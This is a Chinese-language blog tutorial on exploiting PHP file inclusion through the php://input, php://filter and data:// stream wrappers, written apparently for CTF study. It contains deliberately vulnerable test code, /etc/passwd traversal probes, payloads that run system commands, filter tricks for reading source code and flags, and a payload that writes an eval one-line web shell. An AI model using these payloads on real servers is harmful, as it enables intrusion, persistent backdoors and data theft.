<!doctype html>
<head>
  <meta charset="utf-8">
  <meta name="description" content="&lt;ul&gt;
&lt;li&gt;&lt;p&gt;PHP伪协议与文件包含&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;php:&amp;#x2F;&amp;#x2F; 协议&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;ul&gt;
&lt;li&gt;php:&amp;#x2F;&amp;#x2F;input&lt;/li&gt;
&lt;li&gt;php:&amp;#x2F;&amp;#x2F;filter&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;data:&amp;#x2F;&amp;#x2F; 协议&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;">
  <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, user-scalable=yes">
  <title>PHP伪协议与文件包含 | powercat</title>

  <link rel="stylesheet" id="chosen-theme" href="https://rawgit.com/fiatjaf/classless/master/themes/plain/theme.css">
  <script>
let link = document.getElementById('chosen-theme')
let widget = document.createElement('div')
widget.style.position = 'absolute'
widget.style.right = '5px'
widget.style.top = '2px'
widget.style.background = 'beige'
widget.style.color = '#444'
widget.style.zIndex = 99
widget.style.padding = '4px 8px'
widget.innerHTML = `
<label>
  <p>No theme was set on <code>theme_config</code>.<br>
     Choose a theme from the list to experiment with it:</p>
  <select></select>
</label>
`
fetch('https://api.github.com/repos/fiatjaf/classless/contents/themes')
  .then(r => r.json())
  .then(files => {
    document.body.appendChild(widget)
    let select = document.querySelector('select')
    files
      .filter(f => f.type === 'dir')
      .forEach(f => {
        let option = document.createElement('option')
        option.value = f.name
        option.innerHTML = f.name
        select.appendChild(option)
      })
    let options = Array.from(select.querySelectorAll('option'))
    let chosen = options[parseInt(Math.random() * options.length)]
    chosen.selected = true
    link.href = link.href.replace(/themes\/[^\/]+/, `themes/${chosen.value}`)
    select.addEventListener('change', e => {
      let chosen = e.target.value
      link.href = link.href.replace(/themes\/[^\/]+/, `themes/${chosen}`)
    })
  })
  .catch(console.log)
  </script>

<meta name="generator" content="Hexo 6.2.0"></head>

<body>
  <header role="banner">
      <a href="/">
        
          <img src="https://picsum.photos/640/480">
        
      </a>  
    <h1>
      <a href="/">powercat</a>
    </h1>
    <aside>
      <p></p>
    </aside>
  </header>
  
  <main>
    <article>
  <header>
  
  <h1><a href="http://example.com/2021/11/06/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%E4%B8%8E%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">PHP伪协议与文件包含</a></h1>
  <aside>
    
    <time datetime="212021-11-06">
      November 6th 2021
    </time>
    
    <ul>
    
      <li><a href="/tags/study/">study</a></li>
    
    </ul>
  </aside>
</header>

  <div><ul>
<li><p>PHP伪协议与文件包含</p>
</li>
<li><p>php:&#x2F;&#x2F; 协议</p>
</li>
<li><ul>
<li>php:&#x2F;&#x2F;input</li>
<li>php:&#x2F;&#x2F;filter</li>
</ul>
</li>
<li><p>data:&#x2F;&#x2F; 协议</p>
</li>
<li><p>file:&#x2F;&#x2F; 协议</p>
</li>
<li><p>zip:&#x2F;&#x2F;、bzip2:&#x2F;&#x2F;、zlib:&#x2F;&#x2F;协议</p>
</li>
<li><ul>
<li>zip:&#x2F;&#x2F;协议</li>
<li>bzip2:&#x2F;&#x2F;协议</li>
<li>zlib:&#x2F;&#x2F;协议</li>
</ul>
</li>
<li><p>phar:&#x2F;&#x2F;伪协议</p>
</li>
</ul>
<h1 id="文件包含漏洞-File-Inclusion"><a href="#文件包含漏洞-File-Inclusion" class="headerlink" title="文件包含漏洞(File Inclusion)"></a>文件包含漏洞(File Inclusion)</h1><p>文件包含漏洞：即file inclusion，意思是文件包含，是指当服务器开启allow_url_include<strong>选项时，就可以通过PHP的某些文件包含函数利用URL去动态包含文件，此时如果没有对文件来源进行严格审查，就会</strong>导致任意文件读取或者任意命令执行。</p>
<p>文件包含漏洞分为<strong>本地文件包含漏洞</strong>与<strong>远程文件包含漏洞</strong>，远程文件包含漏洞是因为开启了PHP配置中的allow_url_fopen<strong>选项，选项开启之后，服务器允许包含一个远程文件，服务器通过PHP特性函数去包含任意文件时，由于要包含的这个文件来源过滤不严，从而可以去</strong>包含一个恶意文件，而我们可以构造这个恶意文件来达到自己的目的。</p>
<p>文件包含漏洞特征：</p>
<ul>
<li>?page&#x3D;a.php</li>
<li>?home&#x3D;b.html</li>
<li>?file&#x3D;content</li>
</ul>
<p>检测方法：</p>
<ul>
<li>?file&#x3D;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd</li>
<li>?page&#x3D;file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd</li>
<li>?home&#x3D;main.cgi?page&#x3D;<a target="_blank" rel="noopener" href="http://www.a.com/dir/file.txt">http://www.a.com/1.phphttp://1.1.1.1/../../../../dir/file.txt</a></li>
</ul>
<p>关于文件包含漏洞的具体详情，我们不再赘述，下面我们来总结一下PHP伪协议在文件包含中的利用。</p>
<h1 id="PHP伪协议与文件包含"><a href="#PHP伪协议与文件包含" class="headerlink" title="PHP伪协议与文件包含"></a>PHP伪协议与文件包含</h1><p><strong>PHP 带有很多内置 URL 风格的封装协议，可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。</strong></p>
<p>首先归纳下常见的文件包含函数：<code>include</code>、<code>require</code>、<code>include_once</code>、<code>require_once</code>、<code>highlight_file</code> 、<code>show_source</code> 、<code>readfile</code> 、<code>file_get_contents</code> 、<code>fopen</code> 、<code>file</code>，计划对文件包含漏洞与php封装协议的利用方法进行总结，本篇先总结下一些封装协议，涉及的相关协议：<code>php://filter</code>、<code>php://input</code>、<code>file://</code>、<code>data://</code>、<code>zip://</code>、<code>compress.bzip2://</code>、<code>compress.zlib://</code>，后续再对每个文件包含函数进一步进行探讨。</p>
<p><strong>环境概要：</strong></p>
<p>PHP.ini：</p>
<p>allow_url_fopen：on  默认开启  该选项用于设置是否允许将URL作为文件处理。<strong>该选项为on便是激活了 URL 形式的 fopen 封装协议，使得可以访问 URL 对象文件等。</strong></p>
<p>allow_url_include：off  默认关闭，该选项为on便是允许 包含 URL 对象文件等。</p>
<p>为了能够尽可能的列举所有情况本次测试使用的PHP版本为&gt;&#x3D;5.2 具体为5.2，5.3，5.5，7.0；PHP版本&lt;&#x3D;5.2 可以使用%00进行截断。</p>
<h2 id="php-x2F-x2F-协议"><a href="#php-x2F-x2F-协议" class="headerlink" title="php:&#x2F;&#x2F; 协议"></a>php:&#x2F;&#x2F; 协议</h2><p><strong>利用条件：</strong></p>
<ul>
<li>allow_url_fopen：不需要开启</li>
<li>allow_url_include：仅<code>php://input php://stdin php://memory php://temp</code>需要开启</li>
</ul>
<p><strong>作用</strong>：</p>
<p><code>php://</code> <strong>访问各个输入&#x2F;输出流</strong>（I&#x2F;O streams），在CTF中经常使用的是<code>php://filter</code>和<code>php://input</code>，<code>php://filter</code>用于<strong>读取php文件的源码</strong>，<code>php://input</code>用于<strong>执行php代码</strong>。php:&#x2F;&#x2F;filter 读取源代码并进行base64编码输出，不然会直接当做php代码执行就看不到源代码内容了，php:&#x2F;&#x2F;filter在双off的情况下也可以正常使用。</p>
<h3 id="php-x2F-x2F-input"><a href="#php-x2F-x2F-input" class="headerlink" title="php:&#x2F;&#x2F;input"></a>php:&#x2F;&#x2F;input</h3><p><strong>php:&#x2F;&#x2F;input</strong> 可以访问请求的原始数据的只读流，在POST请求中访问POST的<code>data</code>部分，可以将post请求中的数据作为PHP代码执行。</p>
<p>注意：在<code>enctype=&quot;multipart/form-data&quot;</code> 的时候<code>php://input</code>是无效的。</p>
<p><strong>要求PHP.ini：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allow_url_fopen: off或on  // 无要求</span><br><span class="line">allow_url_include: on</span><br></pre></td></tr></table></figure>

<p>用法：?file&#x3D;php:&#x2F;&#x2F;input 数据利用POST直接传过去。如下测试。</p>
<p><strong>测试代码：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    echo file_get_contents($_GET[&#x27;whoami&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>测试结果：</strong></p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeRrmqOkBciaEfeAPcnRVKffkMb2Pt1ug0sTXbqPcC7mZ9ibQKDEOT5w2w/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815163356474</p>
<p>成功输出了我们POST过去的data数据。</p>
<h4 id="php-x2F-x2F-input-执行php代码与写入木马"><a href="#php-x2F-x2F-input-执行php代码与写入木马" class="headerlink" title="php:&#x2F;&#x2F;input 执行php代码与写入木马"></a>php:&#x2F;&#x2F;input 执行php代码与写入木马</h4><p><strong>测试代码：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $filename  = $_GET[&#x27;file&#x27;];</span><br><span class="line">    include($filename);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>我们构造如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.1.103/test.php?file=php://input</span><br><span class="line"></span><br><span class="line">[POST DATA部分]:</span><br><span class="line">&lt;?php phpinfo(); ?&gt;</span><br></pre></td></tr></table></figure>

<p>如下，成功执行：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeWpUqx7mLDPOD6qQzJvUsSxe6laVtKU41NDu6w8dCsovgxUR0oHnyUQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815163848057</p>
<p>命令执行：</p>
<p>我们构造如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.1.103/test.php?file=php://input</span><br><span class="line"></span><br><span class="line">[POST DATA部分]:</span><br><span class="line">&lt;?php system(&#x27;ls /&#x27;); ?&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeGadlQCYFDfgfHe4ic9vubvZ2xIZVDeYxpJrCAKLkadlWDlg9kUe00ibQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815213804709</p>
<p>若有写入权限，可以写入一句话木马：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.1.103/test.php?file=php://input</span><br><span class="line"></span><br><span class="line">[POST DATA部分]:</span><br><span class="line">&lt;?php fputs(fopen(&#x27;shell.php&#x27;,&#x27;w&#x27;),&#x27;&lt;?php @eval($_POST[whoami]);?&gt;&#x27;);?&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoefTic0SHVUm6YxPmmRKJDbpW6nJ5pjXzJLmWLxKgjNbicJHibzjRPPqhSg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815164024699</p>
<p>蚁剑连接成功：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeLh4bw6tGxhuOJI64HFnawcqPhQJNROrkLSE733MRywUaoL77kY81vg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815164139935</p>
<h3 id="php-x2F-x2F-filter"><a href="#php-x2F-x2F-filter" class="headerlink" title="php:&#x2F;&#x2F;filter"></a>php:&#x2F;&#x2F;filter</h3><p><strong>php:&#x2F;&#x2F;filter是一种元封装器，是PHP中特有的协议流，设计用于数据流打开时的筛选过滤应用，作用是作为一个“中间流”来处理其他流。</strong></p>
<p><code>php://filter</code>常用于<strong>读取php文件的源码</strong>，<code>php://input</code>用于<strong>执行php代码</strong>。php:&#x2F;&#x2F;filter 读取源代码并进行base64编码输出，不然会直接当做php代码执行就看不到源代码内容了，<strong>php:&#x2F;&#x2F;filter在allow_url_fopen和allow_url_include双off的情况下也可以正常使用。</strong></p>
<p><strong>要求PHP.ini：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allow_url_fopen: off或on  // 无要求</span><br><span class="line">allow_url_include: off或on  // 无要求</span><br></pre></td></tr></table></figure>

<p><strong>php:&#x2F;&#x2F;filter参数详解：</strong></p>
<p>该协议的参数会在该协议路径上进行传递，多个参数都可以在一个路径上传递。具体参考如下：</p>
<table>
<thead>
<tr>
<th align="left">php:&#x2F;&#x2F;filter 参数</th>
<th align="left">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="left">resource&#x3D;&lt;要过滤的数据流&gt;</td>
<td align="left">必须项。它指定了你要筛选过滤的数据流。</td>
</tr>
<tr>
<td align="left">read&#x3D;&lt;读链的过滤器&gt;</td>
<td align="left">可选项。可以设定一个或多个过滤器名称，以管道符（|）分隔</td>
</tr>
<tr>
<td align="left">write&#x3D;&lt;写链的过滤器&gt;</td>
<td align="left">可选项。可以设定一个或多个过滤器名称，以管道符（|）分隔</td>
</tr>
<tr>
<td align="left">&lt;; 两个链的过滤器&gt;</td>
<td align="left"><strong>任何没有以 *read&#x3D;* 或 *write&#x3D;* 作前缀的筛选器列表会视情况应用于读或写链。</strong></td>
</tr>
</tbody></table>
<p><strong>可用的过滤器列表：</strong></p>
<p>此处列举主要的过滤器类型，详细内容请参考：<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/filters.php">https://www.php.net/manual/zh/filters.php</a></p>
<table>
<thead>
<tr>
<th align="left">字符串过滤器</th>
<th align="left">作用</th>
</tr>
</thead>
<tbody><tr>
<td align="left">string.rot13</td>
<td align="left">等同于<code>str_rot13()</code>，rot13变换</td>
</tr>
<tr>
<td align="left">string.toupper</td>
<td align="left">等同于<code>strtoupper()</code>，转大写字母</td>
</tr>
<tr>
<td align="left">string.tolower</td>
<td align="left">等同于<code>strtolower()</code>，转小写字母</td>
</tr>
<tr>
<td align="left">string.strip_tags</td>
<td align="left">等同于<code>strip_tags()</code>，去除html、PHP语言标签</td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th align="left">转换过滤器</th>
<th align="left">作用</th>
</tr>
</thead>
<tbody><tr>
<td align="left">convert.base64</td>
<td align="left">convert.base64-encode &amp; convert.base64-decode分别等同于<code>base64_encode()</code>和<code>base64_decode()</code>，base64编码解码</td>
</tr>
<tr>
<td align="left">convert.quoted</td>
<td align="left">quoted-printable 字符串与 8 为字符串编码解码，有convert.quoted-printable-encode 和 convert.quoted-printable-decode。使用此过滤器的 decode 版本等同于用 quoted_printable_decode()函数处理所有的流数据。没有和 convert.quoted-printable-encode相对应的函数。</td>
</tr>
<tr>
<td align="left">convert.iconv.*</td>
<td align="left">这个过滤器需要 php 支持 iconv，而 iconv 是默认编译的。使用convert.iconv.*过滤器等同于用iconv()函数处理所有的流数据。</td>
</tr>
</tbody></table>
<p>下面我们来实验用php:&#x2F;&#x2F;filter来读写文件。</p>
<p>测试代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $file1 = $_GET[&#x27;file1&#x27;];</span><br><span class="line">    $file2 = $_GET[&#x27;file2&#x27;];</span><br><span class="line">    $txt = $_GET[&#x27;txt&#x27;];  // 写入的内容</span><br><span class="line">    echo file_get_contents($file1);    // 或者是include($file1);</span><br><span class="line">    file_put_contents($file2,$txt);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h4 id="读取文件"><a href="#读取文件" class="headerlink" title="读取文件"></a>读取文件</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">test.php?file1=php://filter/resource=/etc/passwd</span><br><span class="line"></span><br><span class="line">test.php?file1=php://filter/read=convert.base64-encode/resource=flag.php    // 专用于读取php文件</span><br></pre></td></tr></table></figure>

<p>测试结果：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeykzKia4VDYUO0pR6mUU9a5RSUZdoXXzQEXADXrKYP9aRolCNPKXuXzQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815170005879</p>
<p>读取php文件：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeBNVCic0VC268ZyVmxxPgaKick3DR6Crj5ADmIlteJN8ISvZLbx0vjozA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815170201017</p>
<p>base64解码即可。</p>
<p><strong>在实战中，若是遇上<code>include</code>、<code>require</code>、<code>include_once</code>、<code>require_once</code>、<code>highlight_file</code> 、<code>show_source</code> 、<code>readfile</code> 、<code>file_get_contents</code> 、<code>fopen</code> 、<code>file</code>等文件包含函数，我们可以用php:&#x2F;&#x2F;filter来读取php源码。</strong></p>
<h4 id="写入文件"><a href="#写入文件" class="headerlink" title="写入文件"></a>写入文件</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">test.php?file2=php://filter/resource=test1.txt&amp;txt=Thanks Bunny!</span><br><span class="line">或</span><br><span class="line">test.php?file2=php://filter/write=convert.base64-encode/resource=test2.txt&amp;txt=Thanks Bunny!</span><br></pre></td></tr></table></figure>

<p>分别执行后查看生成的txt文件：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeU2yNaUmOjAWrLsJVmD6kDsndf2TqaJqAkeHKSHnXxcfib7Rkluu2q3Q/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815171035715</p>
<p>如上图写入成功。</p>
<h4 id="php-x2F-x2F-filter-绕过-convert-base64"><a href="#php-x2F-x2F-filter-绕过-convert-base64" class="headerlink" title="php:&#x2F;&#x2F;filter 绕过 convert.base64"></a>php:&#x2F;&#x2F;filter 绕过 convert.base64</h4><h5 id="convert-base64过滤器"><a href="#convert-base64过滤器" class="headerlink" title="convert.base64过滤器"></a>convert.base64过滤器</h5><p>convert.base64-encode &amp; convert.base64-decode分别等同于<code>base64_encode()</code>和<code>base64_decode()</code>，base64编码解码。最常见的，不再赘述。</p>
<p><strong>如果base64被过滤了，那我们就可以用下面的那几个convert转换过滤器。</strong></p>
<h5 id="convert-quoted过滤器"><a href="#convert-quoted过滤器" class="headerlink" title="convert.quoted过滤器"></a>convert.quoted过滤器</h5><p><strong>这个过滤器用于 quoted-printable 字符串与 8 为字符串的编码解码。</strong></p>
<p>有convert.quoted-printable-encode 和 convert.quoted-printable-decode 这两个。</p>
<p>使用此过滤器的 decode 版本等同于用 quoted_printable_decode()函数处理所有的流数据。没有和 convert.quoted-printable-encode相对应的函数。</p>
<blockquote>
<p>quoted_printable_decode() 函数对经过 quoted-printable 编码后的字符串进行解码，返回 8 位的 ASCII 字符串</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$str = &quot;I=0Alove=0AShanghai!&quot;;</span><br><span class="line">echo quoted_printable_decode($str);</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">// 输出I love Shanghai!</span><br></pre></td></tr></table></figure>
</blockquote>
<p>网上用于quoted-printable 编码解码的网址有：</p>
<p><a target="_blank" rel="noopener" href="http://www.mxcz.net/tools/quotedprintable.aspx">http://www.mxcz.net/tools/quotedprintable.aspx</a></p>
<p><a target="_blank" rel="noopener" href="http://web.chacuo.net/charsetquotedprintable">http://web.chacuo.net/charsetquotedprintable</a></p>
<p>测试代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    include($_GET[&#x27;file&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>我们用flag.php来做实验：</p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoe3c0IsdeDAEAtjJKHsqSibgEwstHq8fAMdz80qiaTIATm3UCdJoDaibQXQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815171619018</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.php?file=php://filter/read=convert.quoted-printable-encode/resource=flag.php  </span><br></pre></td></tr></table></figure>

<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeQQdbiaqgicc6gTWYRCz3R403H0ia2H8Dib3buQRDqstNbM9lckQTydbDcw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815173356834</p>
<h5 id="convert-iconv-过滤器"><a href="#convert-iconv-过滤器" class="headerlink" title="convert.iconv.*过滤器"></a>convert.iconv.*过滤器</h5><p>这个过滤器需要 php 支持 iconv，而 iconv 是默认编译的。<strong>使用convert.iconv.*过滤器等同于用iconv()函数处理所有的流数据。</strong></p>
<p><code>convert.iconv.*</code>的使用有两种方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">convert.iconv.&lt;input-encoding&gt;.&lt;output-encoding&gt; </span><br><span class="line">或者</span><br><span class="line">convert.iconv.&lt;input-encoding&gt;/&lt;output-encoding&gt;</span><br></pre></td></tr></table></figure>

<p><strong>PHP iconv()函数</strong></p>
<p>(PHP 4 &gt;&#x3D; 4.0.5, PHP 5, PHP 7)</p>
<p><strong>iconv() — 将字符串按要求的字符编码来转换。</strong></p>
<p>说明</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">iconv ( string $in_charset , string $out_charset , string $str ) : string</span><br></pre></td></tr></table></figure>

<p><strong>将字符串 str 从 in_charset 转换编码到 out_charset，返回转换后的字符串。</strong></p>
<p>蓝帽杯有一道题，文件包含用php:&#x2F;&#x2F;filter读源码，但是base64和read&#x3D;都被过滤了，所以我们可以使用convert.iconv。我们将<code>convert.base64-encode</code>改为<code>convert.iconv.utf-8.utf-7</code>，即<code>filename=php://filter/convert.iconv.utf-8.utf-7/resource=flag.php</code>。</p>
<p>测试代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    include($_GET[&#x27;file&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">test.php?file=php://filter/read=convert.iconv.utf-8.utf-7/resource=flag.php</span><br><span class="line"></span><br><span class="line">// 也就是将utf-8编码转换为utf-7编码</span><br></pre></td></tr></table></figure>

<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoeK9NJRy1ekyY8kOhDia5sHz0YccAqbp19m9oEJ2RzmT5SYsnxMrZbUCQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815174729969</p>
<p>如上图，成功得到flag，其稍作修改即可。</p>
<p>当然，我们也可以用字符串过滤器，如下。</p>
<h5 id="string-rot13（移位编码）"><a href="#string-rot13（移位编码）" class="headerlink" title="string.rot13（移位编码）"></a>string.rot13（移位编码）</h5><p>（自 PHP 4.3.0 起）使用此过滤器<strong>等同于用 str_rot13()函数处理所有的流数据</strong>。</p>
<p>string.rot13对字符串执行 ROT13 转换，ROT13 编码简单地<strong>使用字母表中后面第 13 个字母替换当前字母，同时忽略非字母表中的字符。编码和解码都使用相同的函数，即传递一个编码过的字符串作为参数，将得到原始字符串。</strong></p>
<p>测试代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    include($_GET[&#x27;file&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">test.php?file=php://filter/read=string.rot13/resource=flag.php</span><br><span class="line"></span><br><span class="line">// 也就是将utf-8编码转换为utf-7编码</span><br></pre></td></tr></table></figure>

<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoe6ToewR7M2cMd3X1KIW1qXiam2HTmAy1rRzb2V4Lsga5Z6OpXtNs6Haw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815180506105</p>
<p>在网上将其rot13解码即可，解码地址：<a target="_blank" rel="noopener" href="https://www.jisuan.mobi/puzzm6z1B1HH6yXW.html">https://www.jisuan.mobi/puzzm6z1B1HH6yXW.html</a></p>
<h2 id="data-x2F-x2F-协议"><a href="#data-x2F-x2F-协议" class="headerlink" title="data:&#x2F;&#x2F; 协议"></a>data:&#x2F;&#x2F; 协议</h2><p>数据流封装器，和php:&#x2F;&#x2F;相似都是利用了流的概念，<strong>将原本的要include的文件流重定向到了用户可控制的输入流中</strong>，<strong>简单来说就是<code>执行文件的包含方法包含</code>了你的输入流</strong>，通过你输入payload来实现目的。</p>
<p>经过测试官方文档上存在一处问题，经过测试PHP版本5.2，5.3，5.5，7.0；data:&#x2F;&#x2F; 协议是受限于allow_url_fopen的，官方文档上给出的是NO，所以要使用data:&#x2F;&#x2F;协议需要满足双on条件</p>
<p><strong>要求PHP.ini：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allow_url_fopen: on</span><br><span class="line">allow_url_include: on</span><br></pre></td></tr></table></figure>

<p><strong>用法：</strong></p>
<p>和php伪协议的php:&#x2F;&#x2F;input类似，碰到file_get_contents()可以用；</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">// 打印 “输出&quot; </span><br><span class="line">echo file_get_contents($_GET[file]); </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.php?file=data://text/plain;base64,VGhhbmtzJTIwQnVubnklMjE=</span><br></pre></td></tr></table></figure>

<p><img src="https://mmbiz.qpic.cn/mmbiz_png/1kzx23sqO1nD1IkhvHtlggBPubCFRIoelJYZahPgkra4Q6M94iaYDPLUBvtCoe4wAYFwe09J9HWdHlx84vH8Fiag/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片">image-20200815202309580</p>
<p>如果遇上include文件包含，还可以造成任意代码执行：</p>
<p>测试代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    include($_GET[&#x27;file&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">test.php?file=data://text/plain,&lt;?php phpinfo();?&gt;</span><br><span class="line">或</span><br><span class="line">test.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=</span><br></pre></td></tr></table></figure>

